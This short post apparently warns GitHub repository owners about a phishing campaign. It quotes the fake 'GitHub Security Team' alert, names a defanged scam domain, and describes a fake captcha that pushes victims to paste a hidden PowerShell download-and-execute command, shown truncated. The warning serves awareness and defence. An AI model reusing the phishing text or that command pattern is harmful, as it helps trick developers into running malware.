Crooks sent the fake security alerts to the GitHub repository owners:
Hey there!
We have detected a security vulnerability in your repository. Please contact us at hxxps://github-scanner.com to get more information on how to fix this issue.
Best regards,
Github Security Team"
You will see the fake captcha screen if you open the scam site. 
The click on the captcha will prompt you to run open up Windows Run: powershell.exe -w hidden -Command "iex (iwr '...

Virustotal results for downloaded executable: 47/73!

